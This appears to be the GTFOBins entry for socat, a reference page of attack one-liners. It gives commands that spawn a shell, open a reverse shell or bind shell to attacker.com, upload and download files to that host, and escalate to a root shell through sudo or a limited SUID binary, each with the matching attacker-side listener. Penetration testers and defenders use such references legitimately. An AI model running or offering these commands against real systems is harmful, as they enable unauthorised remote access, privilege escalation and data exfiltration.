GTFOBins.github.io/_gtfobins/socat.md
2020-05-13 19:41:46 +02:00

1.7 KiB

functions
shell reverse-shell bind-shell file-upload file-download sudo limited-suid
description code
The resulting shell is not a proper TTY shell and lacks the prompt. socat stdin exec:/bin/sh
description code
Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
description code
Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell. LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
description code
Run ``socat -u tcp-listen:12345,reuseaddr open:file_to_save,creat`` on the attacker box to collect the file. RHOST=attacker.com RPORT=12345 LFILE=file_to_send socat -u file:$LFILE tcp-connect:$RHOST:$RPORT
description code
Run ``socat -u file:file_to_send tcp-listen:12345,reuseaddr`` on the attacker box to send the file. RHOST=attacker.com RPORT=12345 LFILE=file_to_save socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat
description code
The resulting shell is not a proper TTY shell and lacks the prompt. sudo socat stdin exec:/bin/sh
description code
Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 ./socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane